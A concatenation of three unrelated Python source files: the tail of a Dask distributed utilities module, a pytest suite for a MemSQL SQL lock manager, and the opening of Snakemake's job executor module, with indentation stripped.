sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(importlib.reload(importlib.import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
class itemgetter:
"""A picklable itemgetter.
Examples
--------
>>> data = [0, 1, 2]
>>> get_1 = itemgetter(1)
>>> get_1(data)
1
"""
__slots__ = ("index",)
def __init__(self, index):
self.index = index
def __call__(self, x):
return x[self.index]
def __reduce__(self):
return (itemgetter, (self.index,))
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
widths = tuple(max(max(map(len, x)), len(c)) for x, c in zip(zip(*rows), columns))
row_template = ("|" + (" %%-%ds |" * len(columns))) % widths
header = row_template % tuple(columns)
bar = "+%s+" % "+".join("-" * (w + 2) for w in widths)
data = "\n".join(row_template % r for r in rows)
return "\n".join([bar, header, bar, data, bar])
def nbytes(frame, _bytes_like=(bytes, bytearray)):
""" Number of bytes of a frame or memoryview """
if isinstance(frame, _bytes_like):
return len(frame)
else:
try:
return frame.nbytes
except AttributeError:
return len(frame)
def is_writeable(frame):
"""
Check whether frame is writeable
Will return ``True`` if writeable, ``False`` if readonly, and
``None`` if undetermined.
"""
try:
return not memoryview(frame).readonly
except TypeError:
return None
@contextmanager
def time_warn(duration, text):
start = time()
yield
end = time()
if end - start > duration:
print("TIME WARNING", text, end - start)
def json_load_robust(fn, load=json.load):
""" Reads a JSON file from disk that may be being written as we read """
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
class DequeHandler(logging.Handler):
""" A logging.Handler that records records into a deque """
_instances = weakref.WeakSet()
def __init__(self, *args, n=10000, **kwargs):
self.deque = deque(maxlen=n)
super(DequeHandler, self).__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
inst.clear()
def reset_logger_locks():
"""Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
is_server_extension = False
if "notebook" in sys.modules:
import traitlets
from notebook.notebookapp import NotebookApp
is_server_extension = traitlets.config.Application.initialized() and isinstance(
traitlets.config.Application.instance(), NotebookApp
)
if not is_server_extension:
is_kernel_and_no_running_loop = False
if is_kernel():
try:
get_running_loop()
except RuntimeError:
is_kernel_and_no_running_loop = True
if not is_kernel_and_no_running_loop:
# TODO: Use tornado's AnyThreadEventLoopPolicy, instead of class below,
# once tornado > 6.0.3 is available.
if WINDOWS and hasattr(asyncio, "WindowsSelectorEventLoopPolicy"):
# WindowsProactorEventLoopPolicy is not compatible with tornado 6
# fallback to the pre-3.8 default of Selector
# https://github.com/tornadoweb/tornado/issues/2608
BaseEventLoopPolicy = asyncio.WindowsSelectorEventLoopPolicy
else:
BaseEventLoopPolicy = asyncio.DefaultEventLoopPolicy
class AnyThreadEventLoopPolicy(BaseEventLoopPolicy):
def get_event_loop(self):
try:
return super().get_event_loop()
except (RuntimeError, AssertionError):
loop = self.new_event_loop()
self.set_event_loop(loop)
return loop
asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())
@functools.lru_cache(1000)
def has_keyword(func, keyword):
return keyword in inspect.signature(func).parameters
@functools.lru_cache(1000)
def command_has_keyword(cmd, k):
if cmd is not None:
if isinstance(cmd, str):
try:
from importlib import import_module
cmd = import_module(cmd)
except ImportError:
raise ImportError("Module for command %s is not available" % cmd)
if isinstance(getattr(cmd, "main"), click.core.Command):
cmd = cmd.main
if isinstance(cmd, click.core.Command):
cmd_params = set(
[
p.human_readable_name
for p in cmd.params
if isinstance(p, click.core.Option)
]
)
return k in cmd_params
return False
# from bokeh.palettes import viridis
# palette = viridis(18)
palette = [
"#440154",
"#471669",
"#472A79",
"#433C84",
"#3C4D8A",
"#355D8C",
"#2E6C8E",
"#287A8E",
"#23898D",
"#1E978A",
"#20A585",
"#2EB27C",
"#45BF6F",
"#64CB5D",
"#88D547",
"#AFDC2E",
"#D7E219",
"#FDE724",
]
@toolz.memoize
def color_of(x, palette=palette):
h = md5(str(x).encode())
n = int(h.hexdigest()[:8], 16)
return palette[n % len(palette)]
def iscoroutinefunction(f):
return inspect.iscoroutinefunction(f) or gen.is_coroutine_function(f)
@contextmanager
def warn_on_duration(duration, msg):
start = time()
yield
stop = time()
if stop - start > parse_timedelta(duration):
warnings.warn(msg, stacklevel=2)
def typename(typ):
"""Return name of type
Examples
--------
>>> from distributed import Scheduler
>>> typename(Scheduler)
'distributed.scheduler.Scheduler'
"""
try:
return typ.__module__ + "." + typ.__name__
except AttributeError:
return str(typ)
def format_dashboard_link(host, port):
template = dask.config.get("distributed.dashboard.link")
if dask.config.get("distributed.scheduler.dashboard.tls.cert"):
scheme = "https"
else:
scheme = "http"
return template.format(
**toolz.merge(os.environ, dict(scheme=scheme, host=host, port=port))
)
def parse_ports(port):
"""Parse input port information into list of ports
Parameters
----------
port : int, str, None
Input port or ports. Can be an integer like 8787, a string for a
single port like "8787", a string for a sequential range of ports like
"8000:8200", or None.
Returns
-------
ports : list
List of ports
Examples
--------
A single port can be specified using an integer:
>>> parse_ports(8787)
>>> [8787]
or a string:
>>> parse_ports("8787")
>>> [8787]
A sequential range of ports can be specified by a string which indicates
the first and last ports which should be included in the sequence of ports:
>>> parse_ports("8787:8790")
>>> [8787, 8788, 8789, 8790]
An input of ``None`` is also valid and can be used to indicate that no port
has been specified:
>>> parse_ports(None)
>>> [None]
"""
if isinstance(port, str) and ":" not in port:
port = int(port)
if isinstance(port, (int, type(None))):
ports = [port]
else:
port_start, port_stop = map(int, port.split(":"))
if port_stop <= port_start:
raise ValueError(
"When specifying a range of ports like port_start:port_stop, "
"port_stop must be greater than port_start, but got "
f"port_start={port_start} and port_stop={port_stop}"
)
ports = list(range(port_start, port_stop + 1))
return ports
def is_coroutine_function(f):
return asyncio.iscoroutinefunction(f) or gen.is_coroutine_function(f)
class Log(str):
""" A container for logs """
def _repr_html_(self):
return "<pre><code>\n{log}\n</code></pre>".format(
log=html.escape(self.rstrip())
)
class Logs(dict):
""" A container for multiple logs """
def _repr_html_(self):
summaries = [
"<details>\n"
"<summary style='display:list-item'>{title}</summary>\n"
"{log}\n"
"</details>".format(title=title, log=log._repr_html_())
for title, log in sorted(self.items())
]
return "\n".join(summaries)
def cli_keywords(d: dict, cls=None, cmd=None):
"""Convert a kwargs dictionary into a list of CLI keywords
Parameters
----------
d: dict
The keywords to convert
cls: callable
The callable that consumes these terms to check them for validity
cmd: string or object
A string with the name of a module, or the module containing a
click-generated command with a "main" function, or the function itself.
It may be used to parse a module's custom arguments (i.e., arguments that
are not part of Worker class), such as nprocs from dask-worker CLI or
enable_nvlink from dask-cuda-worker CLI.
Examples
--------
>>> cli_keywords({"x": 123, "save_file": "foo.txt"})
['--x', '123', '--save-file', 'foo.txt']
>>> from dask.distributed import Worker
>>> cli_keywords({"x": 123}, Worker)
Traceback (most recent call last):
...
ValueError: Class distributed.worker.Worker does not support keyword x
"""
if cls or cmd:
for k in d:
if not has_keyword(cls, k) and not command_has_keyword(cmd, k):
if cls and cmd:
raise ValueError(
"Neither class %s or module %s support keyword %s"
% (typename(cls), typename(cmd), k)
)
elif cls:
raise ValueError(
"Class %s does not support keyword %s" % (typename(cls), k)
)
else:
raise ValueError(
"Module %s does not support keyword %s" % (typename(cmd), k)
)
def convert_value(v):
out = str(v)
if " " in out and "'" not in out and '"' not in out:
out = '"' + out + '"'
return out
return sum(
[["--" + k.replace("_", "-"), convert_value(v)] for k, v in d.items()], []
)
def is_valid_xml(text):
return xml.etree.ElementTree.fromstring(text) is not None
try:
_offload_executor = ThreadPoolExecutor(
max_workers=1, thread_name_prefix="Dask-Offload"
)
except TypeError:
_offload_executor = ThreadPoolExecutor(max_workers=1)
weakref.finalize(_offload_executor, _offload_executor.shutdown)
def import_term(name: str):
"""Return the fully qualified term
Examples
--------
>>> import_term("math.sin")
<function math.sin(x, /)>
"""
try:
module_name, attr_name = name.rsplit(".", 1)
except ValueError:
return importlib.import_module(name)
module = importlib.import_module(module_name)
return getattr(module, attr_name)
async def offload(fn, *args, **kwargs):
loop = asyncio.get_event_loop()
return await loop.run_in_executor(_offload_executor, lambda: fn(*args, **kwargs))
def serialize_for_cli(data):
"""Serialize data into a string that can be passthrough cli
Parameters
----------
data: json-serializable object
The data to serialize
Returns
-------
serialized_data: str
The serialized data as a string
"""
return base64.urlsafe_b64encode(json.dumps(data).encode()).decode()
def deserialize_for_cli(data):
"""De-serialize data into the original object
Parameters
----------
data: str
String serialied by serialize_for_cli()
Returns
-------
deserialized_data: obj
The de-serialized data
"""
return json.loads(base64.urlsafe_b64decode(data.encode()).decode())
class EmptyContext:
def __enter__(self):
pass
def __exit__(self, *args):
pass
async def __aenter__(self):
pass
async def __aexit__(self, *args):
pass
empty_context = EmptyContext()
class LRU(UserDict):
"""Limited size mapping, evicting the least recently looked-up key when full"""
def __init__(self, maxsize):
super().__init__()
self.data = OrderedDict()
self.maxsize = maxsize
def __getitem__(self, key):
value = super().__getitem__(key)
self.data.move_to_end(key)
return value
def __setitem__(self, key, value):
if len(self) >= self.maxsize:
self.data.popitem(last=False)
super().__setitem__(key, value)
def clean_dashboard_address(addr, default_listen_ip=""):
"""
Examples
--------
>>> clean_dashboard_address(8787)
{'address': '', 'port': 8787}
>>> clean_dashboard_address(":8787")
{'address': '', 'port': 8787}
>>> clean_dashboard_address("8787")
{'address': '', 'port': 8787}
>>> clean_dashboard_address("8787")
{'address': '', 'port': 8787}
>>> clean_dashboard_address("foo:8787")
{'address': 'foo', 'port': 8787}
"""
if default_listen_ip == "0.0.0.0":
default_listen_ip = "" # for IPV6
try:
addr = int(addr)
except (TypeError, ValueError):
pass
if isinstance(addr, str):
addr = addr.split(":")
if isinstance(addr, (tuple, list)):
if len(addr) == 2:
host, port = (addr[0], int(addr[1]))
elif len(addr) == 1:
[host], port = addr, 0
else:
raise ValueError(addr)
elif isinstance(addr, int):
host = default_listen_ip
port = addr
return {"address": host, "port": port}
|
test_sql_lock.py
|
import pytest
import time
import threading
from memsql.common import database
from memsql.common import sql_lock
from memsql.common import exceptions
@pytest.fixture(scope="module")
def manager_setup(request, test_db_args, test_db_database):
with database.connect(**test_db_args) as conn:
conn.execute('CREATE DATABASE IF NOT EXISTS %s' % test_db_database)
test_db_args['database'] = test_db_database
q = sql_lock.SQLLockManager('test').connect(**test_db_args).setup()
def cleanup():
q.destroy()
request.addfinalizer(cleanup)
@pytest.fixture
def manager(manager_setup, test_db_args, test_db_database):
test_db_args['database'] = test_db_database
m = sql_lock.SQLLockManager('test').connect(**test_db_args)
with m._db_conn() as conn:
conn.query('DELETE FROM %s' % m.table_name)
return m
def test_ensure_connected():
q = sql_lock.SQLLockManager('bad_manager')
with pytest.raises(exceptions.NotConnected):
q.acquire('asdf')
def test_basic(manager):
assert manager.ready()
def test_basic_usage(manager):
l = manager.acquire('asdf', owner="test")
assert l.valid()
assert l.owner == 'test'
with manager._db_conn() as conn:
rows = conn.query('SELECT * FROM %s' % manager.table_name)
assert len(rows) == 1
assert rows[0].owner == 'test'
assert rows[0].id == 'asdf'
assert rows[0].lock_hash == l._lock_hash
def test_threading(manager):
arr = []
def _test():
with manager.acquire('test') as l:
assert l.valid()
arr.append(1)
time.sleep(0.1)
assert len(arr) == 1
arr.pop()
threads = [threading.Thread(target=_test) for i in range(10)]
[t.start() for t in threads]
[t.join() for t in threads]
def test_ping(manager):
l = manager.acquire('test')
with manager._db_conn() as conn:
first = conn.get('SELECT last_contact FROM %s WHERE id=%%s' % manager.table_name, l._lock_id).last_contact
time.sleep(1)
l.ping()
with manager._db_conn() as conn:
assert first != conn.get('SELECT last_contact FROM %s WHERE id=%%s' % manager.table_name, l._lock_id).last_contact
def test_timeout(manager):
l = manager.acquire('test', expiry=1)
time.sleep(1)
assert not l.valid()
assert manager.acquire('test') is not None
def test_non_block(manager):
manager.acquire('test')
assert manager.acquire('test') is None
def test_block_timeout(manager):
acquired = []
def _test():
acquired.append(manager.acquire('test', block=True, timeout=0.5))
# acquire the lock first
manager.acquire('test')
# this will fail to acquire
t = threading.Thread(target=_test)
start = time.time()
t.start()
t.join()
diff = time.time() - start
assert diff >= 0.5
assert acquired[0] is None
def test_release(manager):
l = manager.acquire('test')
assert l.valid()
l.release()
assert not l.valid()
assert not l.ping()
assert not l.release()
assert manager.acquire('test') is not None
|
__init__.py
|
__author__ = "Johannes Köster"
__copyright__ = "Copyright 2022, Johannes Köster"
__email__ = "johannes.koester@uni-due.de"
__license__ = "MIT"
import os
import sys
import contextlib
import time
import datetime
import json
import textwrap
import stat
import shutil
import shlex
import threading
import concurrent.futures
import subprocess
import signal
import tempfile
import threading
from functools import partial
from itertools import chain
from collections import namedtuple
from snakemake.io import _IOFile
import random
import base64
import uuid
import re
import math
from snakemake.jobs import Job
from snakemake.shell import shell
from snakemake.logging import logger
from snakemake.stats import Stats
from snakemake.utils import format, Unformattable, makedirs
from snakemake.io import get_wildcard_names, Wildcards
from snakemake.exceptions import print_exception, get_exception_origin
from snakemake.exceptions import format_error, RuleException, log_verbose_traceback
from snakemake.exceptions import (
ProtectedOutputException,
WorkflowError,
ImproperShadowException,
SpawnedJobError,
CacheMissException,
)
from snakemake.common import Mode, __version__, get_container_image, get_uuid
# TODO move each executor into a separate submodule
def sleep():
# do not sleep on CI. In that case we just want to quickly test everything.
if os.environ.get("CI") != "true":
time.sleep(10)
class AbstractExecutor:
def __init__(
self,
workflow,
dag,
printreason=False,
quiet=False,
printshellcmds=False,
printthreads=True,
latency_wait=3,
keepincomplete=False,
keepmetadata=True,
):
self.workflow = workflow
self.dag = dag
self.quiet = quiet
self.printreason = printreason
self.printshellcmds = printshellcmds
self.printthreads = printthreads
self.latency_wait = latency_wait
self.keepincomplete = keepincomplete
self.keepmetadata = keepmetadata
def get_default_remote_provider_args(self):
if self.workflow.default_remote_provider:
return (
" --default-remote-provider {} " "--default-remote-prefix {} "
).format(
self.workflow.default_remote_provider.__module__.split(".")[-1],
self.workflow.default_remote_prefix,
)
return ""
def _format_key_value_args(self, flag, kwargs):
if kwargs:
return " {} {} ".format(
flag,
" ".join("{}={}".format(key, value) for key, value in kwargs.items()),
)
return ""
def get_set_threads_args(self):
return self._format_key_value_args(
"--set-threads", self.workflow.overwrite_threads
)
def get_set_resources_args(self):
if self.workflow.overwrite_resources:
return " --set-resources {} ".format(
" ".join(
"{}:{}={}".format(rule, name, value)
for rule, res in self.workflow.overwrite_resources.items()
for name, value in res.items()
)
)
return ""
def get_set_scatter_args(self):
return self._format_key_value_args(
"--set-scatter", self.workflow.overwrite_scatter
)
def get_default_resources_args(self, default_resources=None):
if default_resources is None:
default_resources = self.workflow.default_resources
if default_resources:
def fmt(res):
if isinstance(res, str):
res = res.replace('"', r"\"")
return '"{}"'.format(res)
args = " --default-resources {} ".format(
" ".join(map(fmt, self.workflow.default_resources.args))
)
return args
return ""
def get_local_groupid_arg(self):
return f" --local-groupid {self.workflow.local_groupid} "
def get_behavior_args(self):
if self.workflow.conda_not_block_search_path_envvars:
return " --conda-not-block-search-path-envvars "
return ""
def run_jobs(self, jobs, callback=None, submit_callback=None, error_callback=None):
"""Run a list of jobs that is ready at a given point in time.
By default, this method just runs each job individually.
This method can be overwritten to submit many jobs in a more efficient way than one-by-one.
Note that in any case, for each job, the callback functions have to be called individually!
"""
for job in jobs:
self.run(
job,
callback=callback,
submit_callback=submit_callback,
error_callback=error_callback,
)
def run(self, job, callback=None, submit_callback=None, error_callback=None):
"""Run a specific job or group job."""
self._run(job)
callback(job)
def shutdown(self):
pass
def cancel(self):
pass
def _run(self, job):
job.check_protected_output()
self.printjob(job)
def rule_prefix(self, job):
return "local " if job.is_local else ""
def printjob(self, job):
job.log_info(skip_dynamic=True)
def print_job_error(self, job, msg=None, **kwargs):
job.log_error(msg, **kwargs)
def handle_job_success(self, job):
pass
def handle_job_error(self, job):
pass
class DryrunExecutor(AbstractExecutor):
def printjob(self, job):
super().printjob(job)
if job.is_group():
for j in job.jobs:
self.printcache(j)
else:
self.printcache(job)
def printcache(self, job):
if self.workflow.is_cached_rule(job.rule):
if self.workflow.output_file_cache.exists(job):
logger.info(
"Output file {} will be obtained from global between-workflow cache.".format(
job.output[0]
)
)
else:
logger.info(
"Output file {} will be written to global between-workflow cache.".format(
job.output[0]
)
)
class RealExecutor(AbstractExecutor):
def __init__(
self,
workflow,
dag,
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
assume_shared_fs=True,
keepincomplete=False,
keepmetadata=False,
):
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.assume_shared_fs = assume_shared_fs
self.stats = Stats()
self.snakefile = workflow.main_snakefile
def register_job(self, job):
job.register()
def _run(self, job, callback=None, error_callback=None):
super()._run(job)
self.stats.report_job_start(job)
try:
self.register_job(job)
except IOError as e:
logger.info(
"Failed to set marker file for job started ({}). "
"Snakemake will work, but cannot ensure that output files "
"are complete in case of a kill signal or power loss. "
"Please ensure write permissions for the "
"directory {}".format(e, self.workflow.persistence.path)
)
def handle_job_success(
self,
job,
upload_remote=True,
handle_log=True,
handle_touch=True,
ignore_missing_output=False,
):
job.postprocess(
upload_remote=upload_remote,
handle_log=handle_log,
handle_touch=handle_touch,
ignore_missing_output=ignore_missing_output,
latency_wait=self.latency_wait,
assume_shared_fs=self.assume_shared_fs,
keep_metadata=self.keepmetadata,
)
self.stats.report_job_end(job)
def handle_job_error(self, job, upload_remote=True):
job.postprocess(
error=True,
assume_shared_fs=self.assume_shared_fs,
latency_wait=self.latency_wait,
)
def get_additional_args(self):
"""Return a string to add to self.exec_job that includes additional
arguments from the command line. This is currently used in the
ClusterExecutor and CPUExecutor, as both were using the same
code. Both have base class of the RealExecutor.
"""
additional = ""
if not self.workflow.cleanup_scripts:
additional += " --skip-script-cleanup "
if self.workflow.shadow_prefix:
additional += " --shadow-prefix {} ".format(self.workflow.shadow_prefix)
if self.workflow.use_conda:
additional += " --use-conda "
if self.workflow.conda_frontend:
additional += " --conda-frontend {} ".format(
self.workflow.conda_frontend
)
if self.workflow.conda_prefix:
additional += " --conda-prefix {} ".format(self.workflow.conda_prefix)
if self.workflow.conda_base_path and self.assume_shared_fs:
additional += " --conda-base-path {} ".format(
self.workflow.conda_base_path
)
if self.workflow.use_singularity:
additional += " --use-singularity "
if self.workflow.singularity_prefix:
additional += " --singularity-prefix {} ".format(
self.workflow.singularity_prefix
)
if self.workflow.singularity_args:
additional += ' --singularity-args "{}"'.format(
self.workflow.singularity_args
)
if not self.workflow.execute_subworkflows:
additional += " --no-subworkflows "
if self.workflow.max_threads is not None:
additional += " --max-threads {} ".format(self.workflow.max_threads)
additional += self.get_set_resources_args()
additional += self.get_set_scatter_args()
additional += self.get_set_threads_args()
additional += self.get_behavior_args()
if self.workflow.use_env_modules:
additional += " --use-envmodules "
if not self.keepmetadata:
additional += " --drop-metadata "
return additional
def format_job_pattern(self, pattern, job=None, **kwargs):
overwrite_workdir = []
if self.workflow.overwrite_workdir:
overwrite_workdir.extend(("--directory", self.workflow.overwrite_workdir))
overwrite_config = []
if self.workflow.overwrite_configfiles:
# add each of the overwriting configfiles in the original order
if self.workflow.overwrite_configfiles:
overwrite_config.append("--configfiles")
overwrite_config.extend(self.workflow.overwrite_configfiles)
if self.workflow.config_args:
overwrite_config.append("--config")
overwrite_config.extend(self.workflow.config_args)
printshellcmds = ""
if self.workflow.printshellcmds:
printshellcmds = "-p"
if not job.is_branched and not job.is_updated:
# Restrict considered rules. This does not work for updated jobs
# because they need to be updated in the spawned process as well.
rules = ["--allowed-rules"]
rules.extend(job.rules)
else:
rules = []
target = kwargs.get("target", job.get_targets())
snakefile = kwargs.get("snakefile", self.snakefile)
cores = kwargs.get("cores", self.cores)
if "target" in kwargs:
del kwargs["target"]
if "snakefile" in kwargs:
del kwargs["snakefile"]
if "cores" in kwargs:
del kwargs["cores"]
cmd = format(
pattern,
job=job,
attempt=job.attempt,
overwrite_workdir=overwrite_workdir,
overwrite_config=overwrite_config,
printshellcmds=printshellcmds,
workflow=self.workflow,
snakefile=snakefile,
cores=cores,
benchmark_repeats=job.benchmark_repeats if not job.is_group() else None,
target=target,
rules=rules,
**kwargs,
)
return cmd
class TouchExecutor(RealExecutor):
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
try:
# Touching of output files will be done by handle_job_success
time.sleep(0.1)
callback(job)
except OSError as ex:
print_exception(ex, self.workflow.linemaps)
error_callback(job)
def handle_job_success(self, job):
super().handle_job_success(job, ignore_missing_output=True)
_ProcessPoolExceptions = (KeyboardInterrupt,)
try:
from concurrent.futures.process import BrokenProcessPool
_ProcessPoolExceptions = (KeyboardInterrupt, BrokenProcessPool)
except ImportError:
pass
class CPUExecutor(RealExecutor):
def __init__(
self,
workflow,
dag,
workers,
printreason=False,
quiet=False,
printshellcmds=False,
use_threads=False,
latency_wait=3,
cores=1,
keepincomplete=False,
keepmetadata=True,
):
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.exec_job = "\\\n".join(
(
"cd {workflow.workdir_init} && ",
"{sys.executable} -m snakemake {target} --snakefile {snakefile} ",
"--force --cores {cores} --keep-target-files --keep-remote ",
"--attempt {attempt} --scheduler {workflow.scheduler_type} ",
"--force-use-threads --wrapper-prefix {workflow.wrapper_prefix} ",
"--max-inventory-time 0 --ignore-incomplete ",
"--latency-wait {latency_wait} ",
self.get_default_remote_provider_args(),
self.get_default_resources_args(),
self.get_local_groupid_arg(),
"{overwrite_workdir} {overwrite_config} {printshellcmds} {rules} ",
"--notemp --quiet --no-hooks --nolock --mode {} ".format(
Mode.subprocess
),
)
)
self.exec_job += self.get_additional_args()
self.use_threads = use_threads
self.cores = cores
# Zero thread jobs do not need a thread, but they occupy additional workers.
# Hence we need to reserve additional workers for them.
self.workers = workers + 5
self.pool = concurrent.futures.ThreadPoolExecutor(max_workers=self.workers)
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
if job.is_group():
# if we still don't have enough workers for this group, create a new pool here
missing_workers = max(len(job) - self.workers, 0)
if missing_workers:
self.workers += missing_workers
self.pool = concurrent.futures.ThreadPoolExecutor(
max_workers=self.workers
)
# the future waits for the entire group job
future = self.pool.submit(self.run_group_job, job)
else:
future = self.run_single_job(job)
future.add_done_callback(partial(self._callback, job, callback, error_callback))
def job_args_and_prepare(self, job):
job.prepare()
conda_env = (
job.conda_env.address if self.workflow.use_conda and job.conda_env else None
)
container_img = (
job.container_img_path if self.workflow.use_singularity else None
)
env_modules = job.env_modules if self.workflow.use_env_modules else None
benchmark = None
benchmark_repeats = job.benchmark_repeats or 1
if job.benchmark is not None:
benchmark = str(job.benchmark)
return (
job.rule,
job.input._plainstrings(),
job.output._plainstrings(),
job.params,
job.wildcards,
job.threads,
job.resources,
job.log._plainstrings(),
benchmark,
benchmark_repeats,
conda_env,
container_img,
self.workflow.singularity_args,
env_modules,
self.workflow.use_singularity,
self.workflow.linemaps,
self.workflow.debug,
self.workflow.cleanup_scripts,
job.shadow_dir,
job.jobid,
self.workflow.edit_notebook if self.dag.is_edit_notebook_job(job) else None,
self.workflow.conda_base_path,
job.rule.basedir,
self.workflow.sourcecache.runtime_cache_path,
)
def run_single_job(self, job):
if (
self.use_threads
or (not job.is_shadow and not job.is_run)
or job.is_template_engine
):
future = self.pool.submit(
self.cached_or_run, job, run_wrapper, *self.job_args_and_prepare(job)
)
else:
# run directive jobs are spawned into subprocesses
future = self.pool.submit(self.cached_or_run, job, self.spawn_job, job)
return future
def run_group_job(self, job):
"""Run a pipe or service group job.
This lets all items run simultaneously."""
# we only have to consider pipe or service groups because in local running mode,
# these are the only groups that will occur
futures = [self.run_single_job(j) for j in job]
n_non_service = sum(1 for j in job if not j.is_service)
while True:
n_finished = 0
for f in futures:
if f.done():
ex = f.exception()
if ex is not None:
# kill all shell commands of the other group jobs
# there can be only shell commands because the
# run directive is not allowed for pipe jobs
for j in job:
shell.kill(j.jobid)
raise ex
else:
n_finished += 1
if n_finished >= n_non_service:
# terminate all service jobs since all consumers are done
for j in job:
if j.is_service:
logger.info(
f"Terminating service job {j.jobid} since all consuming jobs are finished."
)
shell.terminate(j.jobid)
logger.info(
f"Service job {j.jobid} has been successfully terminated."
)
return
time.sleep(1)
def spawn_job(self, job):
exec_job = self.exec_job
cmd = self.format_job_pattern(
exec_job, job=job, _quote_all=True, latency_wait=self.latency_wait
)
try:
subprocess.check_call(cmd, shell=True)
except subprocess.CalledProcessError as e:
raise SpawnedJobError()
def cached_or_run(self, job, run_func, *args):
"""
Either retrieve result from cache, or run job with given function.
"""
to_cache = self.workflow.is_cached_rule(job.rule)
try:
if to_cache:
self.workflow.output_file_cache.fetch(job)
return
except CacheMissException:
pass
run_func(*args)
if to_cache:
self.workflow.output_file_cache.store(job)
def shutdown(self):
self.pool.shutdown()
def cancel(self):
self.pool.shutdown()
def _callback(self, job, callback, error_callback, future):
try:
ex = future.exception()
if ex is not None:
raise ex
callback(job)
except _ProcessPoolExceptions:
self.handle_job_error(job)
# no error callback, just silently ignore the interrupt as the main scheduler is also killed
except SpawnedJobError:
# don't print error message, this is done by the spawned subprocess
error_callback(job)
except (Exception, BaseException) as ex:
self.print_job_error(job)
if not (job.is_group() or job.shellcmd) or self.workflow.verbose:
print_exception(ex, self.workflow.linemaps)
error_callback(job)
def handle_job_success(self, job):
super().handle_job_success(job)
def handle_job_error(self, job):
super().handle_job_error(job)
if not self.keepincomplete:
job.cleanup()
self.workflow.persistence.cleanup(job)
class ClusterExecutor(RealExecutor):
"""Backend for distributed execution.
The key idea is that a job is converted into a script that invokes Snakemake again, in whatever environment is targeted. The script is submitted to some job management platform (e.g. a cluster scheduler like slurm).
This class can be specialized to generate more specific backends, also for the cloud.
"""
default_jobscript = "jobscript.sh"
def __init__(
self,
workflow,
dag,
cores,
jobname="snakejob.{name}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
cluster_config=None,
local_input=None,
restart_times=None,
exec_job=None,
assume_shared_fs=True,
max_status_checks_per_second=1,
disable_default_remote_provider_args=False,
disable_get_default_resources_args=False,
keepincomplete=False,
keepmetadata=True,
):
from ratelimiter import RateLimiter
local_input = local_input or []
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
assume_shared_fs=assume_shared_fs,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
if not self.assume_shared_fs:
# use relative path to Snakefile
self.snakefile = os.path.relpath(workflow.main_snakefile)
jobscript = workflow.jobscript
if jobscript is None:
jobscript = os.path.join(os.path.dirname(__file__), self.default_jobscript)
try:
with open(jobscript) as f:
self.jobscript = f.read()
except IOError as e:
raise WorkflowError(e)
if not "jobid" in get_wildcard_names(jobname):
raise WorkflowError(
'Defined jobname ("{}") has to contain the wildcard {jobid}.'
)
if exec_job is None:
self.exec_job = "\\\n".join(
(
"{envvars} " "cd {workflow.workdir_init} && "
if assume_shared_fs
else "",
"{sys.executable} " if assume_shared_fs else "python ",
"-m snakemake {target} --snakefile {snakefile} ",
"--force --cores {cores} --keep-target-files --keep-remote --max-inventory-time 0 ",
"{waitfiles_parameter:u} --latency-wait {latency_wait} ",
" --attempt {attempt} {use_threads} --scheduler {workflow.scheduler_type} ",
"--wrapper-prefix {workflow.wrapper_prefix} ",
"{overwrite_workdir} {overwrite_config} {printshellcmds} {rules} "
"--nocolor --notemp --no-hooks --nolock {scheduler_solver_path:u} ",
"--mode {} ".format(Mode.cluster),
)
)
else:
self.exec_job = exec_job
self.exec_job += self.get_additional_args()
self.exec_job += " {job_specific_args:u} "
if not disable_default_remote_provider_args:
self.exec_job += self.get_default_remote_provider_args()
if not disable_get_default_resources_args:
self.exec_job += self.get_default_resources_args()
self.jobname = jobname
self._tmpdir = None
self.cores = cores if cores else "all"
self.cluster_config = cluster_config if cluster_config else dict()
self.restart_times = restart_times
self.active_jobs = list()
self.lock = threading.Lock()
self.wait = True
self.wait_thread = threading.Thread(target=self._wait_thread)
self.wait_thread.daemon = True
self.wait_thread.start()
self.max_status_checks_per_second = max_status_checks_per_second
self.status_rate_limiter = RateLimiter(
max_calls=self.max_status_checks_per_second, period=1
)
def _wait_thread(self):
try:
self._wait_for_jobs()
except Exception as e:
self.workflow.scheduler.executor_error_callback(e)
def shutdown(self):
with self.lock:
self.wait = False
self.wait_thread.join()
if not self.workflow.immediate_submit:
# Only delete tmpdir (containing jobscripts) if not using
# immediate_submit. With immediate_submit, jobs can be scheduled
# after this method is completed. Hence we have to keep the
# directory.
shutil.rmtree(self.tmpdir)
def cancel(self):
self.shutdown()
def _run(self, job, callback=None, error_callback=None):
if self.assume_shared_fs:
job.remove_existing_output()
job.download_remote_input()
super()._run(job, callback=callback, error_callback=error_callback)
@property
def tmpdir(self):
if self._tmpdir is None:
self._tmpdir = tempfile.mkdtemp(dir=".snakemake", prefix="tmp.")
